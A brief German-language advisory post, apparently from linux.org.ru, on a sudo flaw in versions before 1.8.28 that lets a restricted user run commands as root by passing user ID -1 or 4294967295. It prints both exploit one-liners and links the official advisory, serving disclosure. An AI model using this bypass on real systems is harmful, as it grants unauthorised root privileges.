Ein Fehler in sudo ermöglicht es Ihnen, jede ausführbare Datei als Root auszuführen, wenn /etc/sudoers die Ausführung durch andere Benutzer zulässt und für Root verboten ist.
Die Ausnutzung des Fehlers ist ganz einfach:
sudo -u#-1 id -u
oder:
sudo -u#4294967295 id -u
Der Fehler tritt in allen Versionen von sudo vor 1.8.28 auf
Details:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Source: linux.org.ru